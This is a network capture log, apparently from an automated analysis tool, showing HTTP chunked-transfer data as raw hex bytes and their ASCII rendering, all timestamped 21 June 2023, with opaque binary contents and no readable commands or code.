                                                                                                  2023-06-21 18:24:31 UTC569INData Raw: 32 30 30 30 0d 0a 15 0f b8 e7 56 fb 73 1c 93 75 70 5a 76 ed 91 f5 fe 92 34 7d ea 1b ec 17 ae 9e 85 ec ab df 71 1e 08 9f ba 88 5b e1 a8 4f 89 08 12 67 99 d4 f1 3f 44 b9 0f 9b 2a 30 ce 28 ee fd c9 17 ed 17 ef ed d7 e3 43 32 15 f5 9c 26 1e be 9f 40 da 6a 95 c5 25 6e 56 17 68 f8 47 65 14 e5 8e c6 df 9a 49 1d 78 4e 68 17 25 33 aa fd bb d7 ec 5f c4 9e 97 58 81 0f 24 a7 af ba 18 84 57 3e 05 52 1d 14 8e d4 84 cc cf f8 7f d3 9c 5b c2 92 40 96 c8 55 34 0d a4 f4 8c 63 ca 26 8a 58 2e ed 24 bb 7b 5a 45 86 9a 1e da 2b 7e d1 39 45 28 40 e3 b8 f2 3a ad 9b e7 b1 49 06 c7 ac 41 1c 86 3f c0 3a 1e 06 ec c7 ae 62 ac 90 ce b6 8f 1c 8a 3a 10 49 10 e8 fa 24 7f c5 da 31 e8 ca 64 03 93 c1 b3 ec 04 51 21 6e 1c ea db 2b 75 fa 6f d6 1d 61 a6 61 b4 19 89 8d 1b 6e 11 bf 8a 20 70 70 50
                                                                                                  Data Ascii: 2000VsupZv4}q[Og?D*0(C2&@j%nVhGeIxNh%3_X$W>R[@U4c&X.${ZE+~9E(@:IA?:b:I$1dQ!n+uoaan ppP
                                                                                                  2023-06-21 18:24:31 UTC577INData Raw: 29 77 b9 9b b7 ff
                                                                                                  Data Ascii: )w
                                                                                                  2023-06-21 18:24:31 UTC577INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC577INData Raw: 32 30 30 30 0d 0a 90 80 ca b5 1b 61 81 b5 cd fd 82 d2 2b 17 3e 73 af 58 dd f5 95 05 af 19 d3 2f c1 30 f9 0a f4 dc 26 c1 3e e4 49 9f 34 81 25 6a 78 fc 7b 2b 35 dd a0 d4 11 af 94 b8 24 53 e3 e4 42 ab 49 0e b9 8a 50 11 2e b4 ab 3e 7a f4 5d 7f 72 3b a1 7f 8f cb 0d b0 3c 1c f1 e7 41 46 4d f8 db 1d 46 5d 15 81 01 8f 83 8b 75 e4 e2 d9 ed c6 3f 0d 2a ef ca 33 2a 74 9d 04 01 69 9b 95 7f 37 46 dd 21 06 0d 34 07 a6 5d 4e 82 bd 24 d9 d7 28 d1 9b 9f dd a6 69 67 57 25 8a 45 c3 a4 c7 cd ee 09 c6 e1 6b a3 cd d6 28 7c de f7 c3 cf 90 e6 5b 48 60 2a a1 db 34 ca d4 34 f1 6e f7 05 30 d6 f2 67 69 5e f5 3c 40 6d f9 6c 61 92 04 18 7e 49 94 6a c9 ee 8a bb d4 a0 dd b1 36 32 d4 88 b6 81 86 02 02 b9 4e 53 31 87 79 5d 16 bc c4 f7 f1 54 42 c9 f3 7a 5b af 0e 0a 29 a6 e3 68 b2 e5 6c e0
                                                                                                  Data Ascii: 2000a+>sX/0&>I4%jx{+5$SBIP.>z]r;<AFMF]u?*3*ti7F!4]N$(igW%Ek(|[H`*44n0gi^<@mla~Ij62NS1y]TBz[)hl
                                                                                                  2023-06-21 18:24:31 UTC585INData Raw: 15 82 0d 7e 77 f8
                                                                                                  Data Ascii: ~w
                                                                                                  2023-06-21 18:24:31 UTC585INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC585INData Raw: 32 30 30 30 0d 0a 04 9f 25 5a 6d 00 30 2f 21 a8 e8 e4 bd f4 2f bf 6f 11 a6 59 99 d9 4d 20 da 39 cc bb 33 1b 2a 10 d4 f1 ea 10 ef 06 78 54 56 88 83 ca 81 f6 2e 3d 0b f9 c6 fb 1d b7 50 54 63 73 93 31 a3 2b be 29 1b 93 a0 4b 03 47 12 d6 4d b5 b5 2f e0 fd 47 9c a4 ba 7f df 4f 52 ce 2c ce 46 9d b1 08 14 93 50 3f 28 0d 45 5d 0e 60 a2 d5 8f 37 f7 c2 3d 3a d1 6f e6 72 67 f8 64 ba 8b 42 aa e0 9c c2 b1 00 55 13 74 a0 60 ee 3e 59 94 69 26 2f f5 ab cb ad 69 fe 3e 78 c7 e8 99 b9 fd 4d ec 5e fe f2 0d b1 ae 7a b6 e5 ab 15 c3 fe 75 e8 31 b2 ff 24 68 e0 64 c8 7c c7 71 a3 ab 14 92 d5 54 b2 fa 4c 1b 1e 34 13 cc 0e 7a 74 f4 b0 a9 78 7e de 47 04 6f d0 5e 19 a8 20 9c 9d 9c 12 76 b8 38 e0 17 d9 ef 75 c9 08 65 2d 94 55 3f 34 33 78 fc a5 29 dc f1 c5 18 57 6c 59 cf 0a 29 1d 24 16
                                                                                                  Data Ascii: 2000%Zm0/!/oYM 93*xTV.=PTcs1+)KGM/GOR,FP?(E]`7=:orgdBUt`>Yi&/i>xM^zu1$hd|qTL4ztx~Go^ v8ue-U?43x)WlY)$
                                                                                                  2023-06-21 18:24:31 UTC593INData Raw: a4 8d a5 9f e5 8f
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC593INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC593INData Raw: 32 30 30 30 0d 0a 89 60 68 ce 57 e0 b5 eb 31 cc e1 13 6f 29 14 df e4 1d ad 66 01 c3 c7 52 d2 9b b2 ba 3b 04 3a a3 07 5f 50 b5 8e 15 64 e4 92 a4 c2 90 5f 27 14 bf 51 e9 49 42 46 45 e0 3b 40 86 c2 4d c5 a9 06 46 0c e0 14 6c 64 10 f9 30 36 40 72 6b 7b 50 a2 85 ef 43 53 b6 38 c9 4f c2 0a 53 a6 c6 e7 be 36 53 d7 56 ac 29 08 a4 ce 7c 88 47 e1 72 95 12 f4 71 f9 86 02 ed bf 64 23 e7 df 3c 86 e0 ef b7 fb 71 a0 2e 14 0a ec ab 12 45 74 24 1b e4 3a f5 27 a8 9c 87 e1 f6 0e 87 f5 3b 6c 30 8d 39 1a 3e 40 da 95 89 ab f0 96 ff 18 bc a2 c1 35 2c 8d 32 dc a9 f3 1e 23 4f f4 e0 f5 85 fd 9d e1 b4 28 b3 36 fa a0 7d 02 61 11 c0 68 bf 39 63 0a 2f 44 16 ac 43 c5 16 05 28 d8 c8 df d3 aa 34 0d 21 e2 c1 0c 99 4b 45 41 a9 ed ea b2 6d 23 59 3e c3 58 f9 0d 67 91 ee 39 00 64 71 41 05 6e
                                                                                                  Data Ascii: 2000`hW1o)fR;:_Pd_'QIBFE;@MFld06@rk{PCS8OS6SV)|Grqd#<q.Et$:';l09>@5,2#O(6}ah9c/DC(4!KEAm#Y>Xg9dqAn
                                                                                                  2023-06-21 18:24:31 UTC601INData Raw: cc da 9b 47 84 b8
                                                                                                  Data Ascii: G
                                                                                                  2023-06-21 18:24:31 UTC601INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC601INData Raw: 32 30 30 30 0d 0a 76 fd 08 28 74 6f ef 54 70 6f ff a7 b3 87 5b a7 8f 1c fb 15 df ee 18 b5 74 2c db dc fa f3 a9 77 dd 44 14 4d c0 d7 4c 80 6f f9 45 c6 2f be 8a 64 5a 09 8c a4 d9 f2 1d b8 db c5 50 61 70 41 91 ae 01 a7 f2 7d 81 dd 0a bc a3 da ce d4 49 e2 0f 1c 7c 38 86 87 20 6a f2 2c c8 e1 56 00 bd 2a 88 cd 02 4a bf 70 3a 3b 41 cc db 6e 1d 72 1d ad 7a 8d 7f 30 0e ba 1e 20 7e 0d b4 d5 7c 6c 11 a4 2a 11 f7 06 1e 1a d9 40 ed dc 59 05 ef e1 5d 56 73 85 7f be 03 4b 3b 4a 74 f8 63 0e 7d cf 9c 9d 3c 54 d9 a0 74 a6 89 64 67 1f 12 21 fa 60 86 da 1f be c3 2b da 13 89 45 5c 33 f6 d0 d0 74 3c d9 ce ad 17 76 5e 3c 78 4e b4 d2 40 eb 6c 97 ec 8e eb a4 a3 48 ab 17 7a 9a 2d 69 cd 86 b2 fa 33 e6 55 cb 8b c6 83 11 36 17 e7 bd 9d 49 e5 41 51 27 9d 08 64 38 35 53 3d 5b 42 1c 0c
                                                                                                  Data Ascii: 2000v(toTpo[t,wDMLoE/dZPapA}I|8 j,V*Jp:;Anrz0 ~|l*@Y]VsK;Jtc}<Ttdg!`+E\3t<v^<xN@lHz-i3U6IAQ'd85S=[B
                                                                                                  2023-06-21 18:24:31 UTC609INData Raw: 57 be 3f e1 56 a9
                                                                                                  Data Ascii: W?V
                                                                                                  2023-06-21 18:24:31 UTC609INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC609INData Raw: 31 66 66 38 0d 0a 14 ea 2e a0 d8 5d 05 40 7d 82 2d 32 93 c3 a5 8b ea f9 a4 e5 ed 8e 2f 33 1a ea 22 b3 7d ff c0 47 54 c4 54 e8 48 c4 fc 75 3b 19 3c dd 6f 72 7a 9d b0 63 51 a0 1d b3 d5 6b b5 d3 02 c5 03 ec fa d3 1c 13 e8 d5 56 41 7a 46 32 a3 65 a9 22 dc 39 a9 e8 43 2b 58 58 8f 6c d9 e3 05 e2 3e b6 3a 6a 20 6b bb e1 5b 8c ef 91 85 d3 93 c6 e4 a2 ad 7f ec d5 94 16 b3 34 d1 3b 9b 4e a4 eb 07 b6 e6 d9 3e a1 6c 39 f3 88 cb fe ae 9c 40 b8 5c 09 50 5a 35 f0 ee 73 0c eb af 8e ba aa 5d 5d 25 dc 76 60 d5 47 56 dc 90 24 1c d8 24 96 cd ef 3e 8b e9 9b 83 3c a6 2e 68 a1 18 f5 2f a1 64 77 e9 2c 0f 02 54 7e 73 3c ae e8 ac d0 47 08 cf b5 33 41 3e 04 fc 26 44 b0 f7 ea 49 88 0a b9 c8 ed 74 d3 a2 17 6b 34 35 83 a2 49 4b 07 31 20 ea 30 db c5 50 28 1d 2b 61 fe 73 96 45 0d 87 85
                                                                                                  Data Ascii: 1ff8.]@}-2/3"}GTTHu;<orzcQkVAzF2e"9C+XXl>:j k[4;N>l9@\PZ5s]]%v`GV$$><.h/dw,T~s<G3A>&DItk45IK1 0P(+asE
                                                                                                  2023-06-21 18:24:31 UTC617INData Raw: 32 30 30 30 0d 0a
                                                                                                  Data Ascii: 2000
                                                                                                  2023-06-21 18:24:31 UTC617INData Raw: 22 ab 7a a8 a9 2b 38 f4 38 9c bd 5e 2e 65 43 35 6a 37 21 5a a7 79 d1 9c 3d b1 ce 73 e3 b9 be 2c ab 9c bd b7 bd 49 17 04 18 25 a8 95 9e 1a 21 eb 08 f2 ab b0 d7 19 0f 4d 83 c5 60 68 0d d1 eb 2c 38 95 b3 de c6 39 b9 3f b6 b8 93 40 d8 5e 1b 1c bb 57 23 d3 58 0d ea 2d 2d de 9e 17 fc 63 38 d9 41 d6 1f f1 09 81 aa 76 27 ad f2 03 42 96 8a b7 a6 79 f6 b8 d5 b2 e6 61 59 f0 60 59 ad f1 55 70 ad 03 55 e1 05 76 ef 28 c9 33 38 89 2c 86 fe 47 4e 16 a5 cf ac 55 e9 4a 85 7a 30 93 fa d5 7f f0 cb 16 7a 3d 24 d9 6d 00 b8 dd 02 5c 77 63 06 ce a2 8c 97 56 fa 24 4c b1 df 32 32 a8 22 76 e0 b8 9b 81 7c 05 c0 ff 78 d2 e9 09 15 b5 2e 51 57 65 d3 34 f0 38 0b 00 59 09 aa 95 1f ed fc 20 ed eb 9f 92 69 ed 7a 32 5d 69 4e 94 ae 6f 32 54 29 00 46 3c 2a 1a 71 d9 6d dc 68 06 1d 06 4a 9b e5
                                                                                                  Data Ascii: "z+88^.eC5j7!Zy=s,I%!M`h,89?@^W#X--c8Av'ByaY`YUpUv(38,GNUJz0z=$m\wcV$L22"v|x.QWe48Y iz2]iNo2T)F<*qmhJ
                                                                                                  2023-06-21 18:24:31 UTC625INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC625INData Raw: 32 30 30 30 0d 0a 7b be ff ec 47 1d c0 cd bf 30 5c f7 c5 38 1b b6 ce b9 4b 36 e7 f6 99 93 c3 c1 9c d3 ef 19 29 8e 3d a6 27 2a ab ab 85 52 9e 27 2b 79 bd 10 c4 b2 eb d1 60 d6 bb 58 2e 67 5d 5b 61 82 3c 2a 78 00 9c 74 60 50 b0 45 ee 41 68 c0 8b 08 de 40 9d 1e a5 94 30 58 2a 89 50 f2 00 87 f7 31 03 55 b4 08 60 6a ea 8a 9b 30 b5 17 6b 2e a9 e0 dc bc cb 6c 20 45 a0 6c e5 05 83 76 a5 87 b5 6d 1a 7b 54 3f 25 d2 86 59 91 3f d5 b9 bf f2 8b e8 3e 1f 5f 95 f1 35 41 c7 75 04 80 b8 b7 71 5a ee 03 e2 63 57 e0 45 34 0e 02 62 bc f4 e8 37 21 ff c6 c9 8d e5 a2 ef 53 f4 5b 21 af 76 4e cb 01 5b a2 b6 8e e7 9c 82 1b aa f9 a5 e7 95 cf 2e 15 12 0b f9 c6 c8 7c 52 bc 30 96 0b 4c e0 0a ac 72 6e f6 c4 15 d7 1c 7e c2 ec 0b 40 12 b4 c5 46 ac 22 96 01 af 28 eb 97 3c c2 f6 61 82 78 a4
                                                                                                  Data Ascii: 2000{G0\8K6)='*R'+y`X.g][a<*xt`PEAh@0X*P1U`j0k.l Elvm{T?%Y?>_5AuqZcWE4b7!S[!vN[.|R0Lrn~@F"(<ax
                                                                                                  2023-06-21 18:24:31 UTC633INData Raw: bc b2 dc f9 cd 02
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC633INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC633INData Raw: 32 30 30 30 0d 0a 55 59 f2 3c 98 e1 c4 4e 0c 09 8b 2b 8e 16 11 0c e0 3d 8b cd e5 4c df cd 0a 2d 4f 6a b1 aa b8 27 89 1d cc ec 85 f8 da 3d d8 65 e2 41 d2 fd 01 98 c6 45 4a 44 39 8d ed f4 c1 ae 2e b2 bf f3 d9 f1 f1 8c 3a 80 f5 ec 03 4c 8a 11 70 60 5a 11 d8 d0 09 ef 19 f2 a7 96 88 0e 1e 89 dc 45 46 6f 56 79 f9 03 13 b8 da c2 b0 58 db 4d e4 ff 2d 0d 10 19 0f d5 34 4c 21 6a 8a 06 a1 a9 be 81 29 43 c2 17 6d ed 7e 8f c1 c2 79 54 0b d2 35 36 48 f0 d2 d9 96 2f 3e b6 5e 98 7a 71 8c 5d 97 f1 bb 35 b6 9e 3c 75 4c 9d 97 f3 37 bc 1c 84 3e 52 4d bf c5 e6 81 c9 06 03 53 28 f7 bb 32 ab 60 28 d6 da 5d 0a 17 87 02 46 cc 84 9a f4 a9 ab 67 55 0b c0 33 4a 82 e4 99 00 32 2e aa 51 f2 1c be 31 6a b4 7e f2 f5 a8 a3 42 0d f3 55 19 21 49 ae 9a b3 ee 12 d6 af 53 18 92 96 9f 9d 4a 06
                                                                                                  Data Ascii: 2000UY<N+=L-Oj'=eAEJD9.:Lp`ZEFoVyXM-4L!j)Cm~yT56H/>^zq]5<uL7>RMS(2`(]FgU3J2.Q1j~BU!ISJ
                                                                                                  2023-06-21 18:24:31 UTC641INData Raw: 7f ef 32 ba ba ff
                                                                                                  Data Ascii: 2
                                                                                                  2023-06-21 18:24:31 UTC641INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC641INData Raw: 32 30 30 30 0d 0a bc cf dc 3a e1 72 b7 b6 bc 13 65 bc d0 8d 63 66 96 83 37 46 e7 fc fd 0d 41 66 aa 59 5e 16 d8 8b 74 9e 83 6b a5 13 57 77 0f 45 25 d5 69 27 04 8f ca f5 e0 81 c5 17 61 e5 a9 08 82 de f3 b0 7f 59 ab 5d 2b 5b 23 4d b2 2a 47 41 b2 70 b5 f9 ca 5f 08 c3 35 51 00 d9 5b fb 45 7d e6 e0 a3 07 0f 05 70 90 63 ba dd 52 6e 14 a4 74 31 b9 3e 43 7d 05 5f 4e 8c 37 55 4b a1 65 db a4 2a 95 2f 49 cf dc 42 59 da ca fd 12 22 11 da 0e ac 26 c9 23 01 be 84 68 39 af 22 66 7e 41 3d 13 9a f6 3f 65 94 6e 50 ad 94 12 ee a9 d0 07 96 ec 36 c7 a9 77 91 22 2e 20 c5 06 ec 9d 0d 1e 80 1b 9e 3d 63 de 81 63 b2 5d 8a 00 2c 78 fd cb 81 ab 03 d8 1f c0 e1 b3 7d cb 47 b4 76 22 9b 57 65 e6 05 0f 5d 84 21 f4 15 ca 00 ef ac d1 0a 47 5c 32 ac 04 cf bd f1 e1 7e 20 18 5e b4 d3 8f e0 51
                                                                                                  Data Ascii: 2000:recf7FAfY^tkWwE%i'aY]+[#M*GAp_5Q[E}pcRnt1>C}_N7UKe*/IBY"&#h9"f~A=?enP6w". =cc],x}Gv"We]!G\2~ ^Q
                                                                                                  2023-06-21 18:24:31 UTC649INData Raw: b4 80 a7 7f f0 bd
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC649INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC649INData Raw: 32 30 30 30 0d 0a 7b 56 27 60 87 e8 cf ae 1f 86 9e ee 54 e2 88 95 67 12 ca de 6a a9 f2 e3 8a 03 7d c2 19 dd ab 4e fe f6 c5 0f da 67 b1 b1 b2 90 b1 bd fa 81 40 3c c0 74 8a 0d 97 88 63 af 4f bb 47 01 c2 85 fe f1 b4 ac b7 13 f0 85 4d 0e 40 98 14 57 04 47 25 57 4f 40 9d 00 cc b2 02 ac 55 07 55 fe 51 8c 2e 23 7c 6f e5 a4 d4 0a 75 cd c0 fa fb 45 ee ce c4 9b 0d 98 9d 34 33 b1 3d 69 b5 80 5c 63 ed 5b a4 d6 90 07 54 f4 27 4b 73 02 84 df c3 85 a6 b6 d8 3c 6b 95 57 6d 0d c7 fe db 47 06 8e 49 ee 15 1d b7 14 9b cc 85 ca 92 28 ca db dd cc 1c ae 46 df 24 57 0b d3 06 06 04 a9 f4 8b 81 95 3d 55 ba 9b 6e 7d 9d 3f 4f 27 93 3a d4 83 06 3a 5c 94 6a f0 60 7e e8 cc ab 0e 39 02 70 c7 89 47 5a 9a 80 2a a2 b2 ff 32 56 ef 51 4b 63 b8 9f ab 0c b6 56 6f 6b cf 70 68 2a 59 d1 7b a2 83
                                                                                                  Data Ascii: 2000{V'`Tgj}Ng@<tcOGM@WG%WO@UUQ.#|ouE43=i\c[T'Ks<kWmGI(F$W=Un}?O'::\j`~9pGZ*2VQKcVokph*Y{
                                                                                                  2023-06-21 18:24:31 UTC657INData Raw: 80 2f de 77 d7 4a
                                                                                                  Data Ascii: /wJ
                                                                                                  2023-06-21 18:24:31 UTC657INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC657INData Raw: 32 30 30 30 0d 0a a1 73 f5 51 0b f8 4f f9 11 9b 46 fe 27 fe 93 0d 27 d0 17 c3 ec de 58 fa 55 b6 7e 80 de 95 c2 aa ac b4 77 2f 3d 37 91 c6 2c df 02 d5 33 2d 19 d0 4a 2b 12 4e 62 82 b8 e9 af da f4 f2 ef f3 7e f6 07 e3 16 41 70 74 24 d8 11 fd e0 8f 4e 14 0c 48 41 89 a6 b0 26 40 3e af 45 35 b6 bc f1 a4 19 7b c4 83 0e 3d 0a f8 67 8c fe 11 27 2b 33 9e ba e9 ac 7b 76 8b 55 f7 8b 40 a6 91 d8 9e 01 e6 17 2d e7 15 c5 d9 03 af 88 fa 8e 10 87 8b 7d 5c 8e 38 dc c4 55 23 8f 54 10 a7 1f 91 29 ba 08 61 95 c8 d5 84 b5 b1 a4 dc 45 bf 2f a8 c9 97 08 ab a8 90 5b 04 c1 bd 8c ec bc 40 25 d5 20 c0 b3 31 97 16 2c 7a ad f0 9e 68 00 77 cd 33 c8 1e 2b 7a d7 9c b8 2d 26 ce 19 93 d5 d1 04 3c 39 a9 cc 00 00 71 8f 7f 74 64 21 98 eb 16 e1 e7 f2 6f 62 cd d3 01 f0 c9 0e 28 b0 8e 4d 3d 9d
                                                                                                  Data Ascii: 2000sQOF''XU~w/=7,3-J+Nb~Apt$NHA&@>E5{=g'+3{vU@-}\8U#T)aE/[@% 1,zhw3+z-&<9qtd!ob(M=
                                                                                                  2023-06-21 18:24:31 UTC665INData Raw: 62 28 ae 26 9d 47
                                                                                                  Data Ascii: b(&G
                                                                                                  2023-06-21 18:24:31 UTC665INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC665INData Raw: 32 30 30 30 0d 0a ce b2 83 57 d7 49 4d 8e a4 a3 4a 55 01 f1 29 c1 40 fe 49 15 fa 9d 9b 90 6c 09 f3 fa 62 1d a3 75 f5 ee e1 c6 96 5f b8 9b da 87 74 f6 7c 07 82 88 80 06 f1 ed 74 5c eb 53 d0 ca fa 63 92 6a df ec fb d9 9f d7 8f fd 6e fd f6 13 a8 9f 87 bf 25 ac 3f 0f 54 01 0e f9 12 1c 05 19 ac e6 52 99 08 b8 39 de 34 8c eb 7f 72 4b 34 55 bb c7 f2 50 ef 9d b2 5c 8a e0 47 27 c6 69 3b 4c d5 30 06 7d 17 2d d3 e0 93 b1 ab 94 ef 4a 23 ed d7 70 4c 84 cc 5d f6 9e c5 36 e2 d0 c3 63 80 fc 68 ad ce 91 83 7b fc f0 ac 86 83 d1 e2 5e 18 6e dc 90 8d ec e1 3f dd 9b 6b 24 6e 90 92 9d 63 a8 d8 05 83 7a 83 39 b2 52 61 21 6b 8d ec 4e 71 ce 9d e7 c0 00 a0 24 7a 3c 88 a3 84 3d 42 39 e5 d2 3c ff e8 c5 f8 4a a7 48 5f 44 bd b5 57 2a 26 14 45 69 f2 c8 89 d1 1d 06 c0 c2 2b b8 ae ea 31
                                                                                                  Data Ascii: 2000WIMJU)@Ilbu_t|t\Scjn%?TR94rK4UP\G'i;L0}-J#pL]6ch{^n?k$ncz9Ra!kNq$z<=B9<JH_DW*&Ei+1
                                                                                                  2023-06-21 18:24:31 UTC673INData Raw: de 50 8d c9 aa 6e
                                                                                                  Data Ascii: Pn
                                                                                                  2023-06-21 18:24:31 UTC673INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC673INData Raw: 31 66 66 38 0d 0a 6a 9a 0c 0a 7c 16 07 9a a5 6f 5b 65 38 23 4e 90 ad d2 84 fd d8 86 35 f4 f5 d6 6c 27 d9 88 86 2e 1d bd e2 12 b4 35 8f 57 90 f3 8c 7d ad 1a 6c fd a1 88 58 a0 45 f3 86 56 51 a8 66 70 f4 c9 fa 6c 0d eb 42 9e 71 d6 3d 37 a6 01 5b bb e8 87 07 08 fe a3 32 04 34 d4 e6 65 76 48 ed ac 0b 43 47 9e ec 24 1b ad 8b c0 8b 78 f5 5c 11 9f 1b 15 fe 2a b7 cf 51 c0 4d a5 ad ae e9 ca 70 5e 71 a5 2d 40 a5 2d 99 b2 3b 8b da 96 29 fe 7f a1 3c da 36 c3 db 43 c2 f8 e3 3c 25 2d f1 81 9a fb 2b 5e 12 4f de 9d 94 a4 0e d8 bd ad 6f 7b 2e fb 59 ff 56 cc e0 f0 8f a5 6b 07 06 1d c1 74 fb 94 ca 8b ad 88 7f 72 3a 9b d9 00 a8 34 15 1a 7b d3 e8 84 f8 1b cd 12 4f 5e 8f 77 a1 01 9b dd 8c 38 7e 23 95 44 86 0b 4c 97 bd 87 00 d4 1c db 7d ab d5 c3 da 3e c5 19 ca a3 44 b6 ea 69 be
                                                                                                  Data Ascii: 1ff8j|o[e8#N5l'.5W}lXEVQfplBq=7[24evHCG$x\*QMp^q-@-;)<6C<%-+^Oo{.YVktr:4{O^w8~#DL}>Di
                                                                                                  2023-06-21 18:24:31 UTC681INData Raw: 32 30 30 30 0d 0a
                                                                                                  Data Ascii: 2000
                                                                                                  2023-06-21 18:24:31 UTC681INData Raw: ad bb 99 44 df 10 02 26 a8 df ae 3e 54 4a b1 d8 6c 2f 16 e0 7d 0e 23 36 f6 4d 5b 8f 85 79 25 96 1f 8d 65 f2 8b e7 dc 68 e8 cc 92 52 46 21 19 68 76 b8 7c 67 83 ad 24 93 de 28 8e ad 84 d6 16 91 9c e2 1a b4 1a 81 ab 19 21 cf 05 03 ab 6f e2 b8 2c bf b2 c0 e3 b6 48 55 3a a9 87 fc c3 cc 1b 5f fa 1f ab 6a f8 0b 2a 56 cc d4 0e e8 12 09 c5 2d b5 41 49 e6 96 8b e4 33 28 49 ae 17 58 24 65 5b 2b 53 69 12 27 be 4b 35 ad b6 8e b3 8e 66 71 81 55 cc 53 92 a7 85 6a fd af 01 8c 88 e8 13 12 e8 f9 58 3c 1c c6 ef 52 0d 31 f4 f4 11 ed 22 dc 30 b0 8c a2 e8 23 ef c8 b4 2f 5b 29 ca 33 fd 28 23 a2 4f 9f 50 a9 73 20 39 81 93 a7 84 cc 5a c1 5e bc 34 5b c1 18 97 74 8a f3 fc c9 a3 b6 64 55 07 73 a1 14 45 ad 49 6a a8 7a 9a dc 09 86 c4 94 3c e1 fb a4 56 56 e2 0d 60 ae ef 6f 7e f7 f2 23
                                                                                                  Data Ascii: D&>TJl/}#6M[y%ehRF!hv|g$(!o,HU:_j*V-AI3(IX$e[+Si'K5fqUSjX<R1"0#/[)3(#OPs 9Z^4[tdUsEIjz<VV`o~#
                                                                                                  2023-06-21 18:24:31 UTC689INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC689INData Raw: 32 30 30 30 0d 0a 6c 5e 04 ea e0 8d 78 32 ea f3 b9 61 f9 a3 8f ab e6 89 4d 7d 05 61 68 be 27 cf ba 48 0b 69 80 27 a0 7a f0 b8 5f 28 76 c6 94 66 7a d2 0d aa 38 71 d9 e7 ce fb e8 c3 38 8a a3 2a b3 db 4a 6d ae f7 6f 6d b2 25 a3 bb 06 2d c9 c0 c1 66 54 dd 13 9b 1b 41 af a8 18 de 43 52 b1 ab 57 c4 a3 f2 5c cf 78 70 ec e2 6b 05 91 d1 26 d1 c7 ef 64 65 9f 5a 7f 4f c5 be 0d 28 95 95 60 e6 7c b9 15 36 ed a3 fe e3 3b 5e 08 54 eb a3 77 87 99 f8 8f 3d 3b 4d a4 d5 4b c7 c1 5a c6 c1 9d a6 de a8 33 d2 cc d9 b9 db 02 5c 34 ae ad 4d 7e 94 5d 57 e3 2d 60 bd 00 4e a9 27 ad c7 c2 aa d4 4b 7b 73 b2 a5 cd bb bb 4a 19 ca d1 ce 92 82 fb 23 06 41 94 d6 a8 9f 4c 7e c6 46 ac 5a dd 11 c0 44 48 38 b1 0b cf dd 45 64 d2 ef 10 84 5b 2c 4b 56 3d b8 f3 5c b6 72 36 a4 3f 31 c6 cf 4f 48 64
                                                                                                  Data Ascii: 2000l^x2aM}ah'Hi'z_(vfz8q8*Jmom%-fTACRW\xpk&deZO(`|6;^Tw=;MKZ3\4M~]W-`N'K{sJ#AL~FZDH8Ed[,KV=\r6?1OHd
                                                                                                  2023-06-21 18:24:31 UTC697INData Raw: ad 55 1c 49 b0 02
                                                                                                  Data Ascii: UI
                                                                                                  2023-06-21 18:24:31 UTC697INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC697INData Raw: 32 30 30 30 0d 0a d8 4d 77 1a d9 42 3d 25 a9 11 05 f2 b3 fe 0e dd 5f ab ac ea a6 09 9b 26 ba c9 b1 2b c7 4f d5 a5 fb d6 21 ee e4 ca cd 78 8a d2 0b cf da 39 b6 63 ce 78 0d 69 16 01 e5 fc b5 d4 22 d2 1e 04 84 8f 7e e1 34 96 c2 d0 36 ab f1 00 22 8b 28 66 fe f1 3b 91 3f 09 59 77 ca dc ad 3b f5 5f b3 8e 15 7f cb 4b dc df 5f 4d 27 a9 12 91 cc 57 68 ff 20 51 1e 44 44 d1 49 cf 38 5c cf 01 35 6a b6 21 f4 5f 56 26 fc 7f 41 9c 86 6f 8e 1b 30 28 da 59 60 1e bd db 17 bb ab 96 f5 0b 20 1b d5 d5 57 93 f1 6c 33 f9 30 e4 77 e7 8b 04 d6 2d 08 4a 7f 36 55 6c 3a f3 cb bd f6 fc f7 95 65 8e 17 67 e9 e8 04 12 8a 33 c8 db b9 2a 41 1c cd 1e fe 37 45 7c 6e 4b 95 b6 91 e0 a3 c9 de 83 51 d1 9e 89 72 92 dd d1 e2 3b 39 c5 e9 05 00 b8 64 49 c4 1c 12 41 20 24 57 73 5f 11 6a cc eb 42 b0
                                                                                                  Data Ascii: 2000MwB=%_&+O!x9cxi"~46"(f;?Yw;_K_M'Wh QDDI8\5j!_V&Ao0(Y` Wl30w-J6Ul:eg3*A7E|nKQr;9dIA $Ws_jB
                                                                                                  2023-06-21 18:24:31 UTC705INData Raw: 00 00 10 04 00 80
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC705INData Raw: 0d 0a
                                                                                                  Data Ascii:
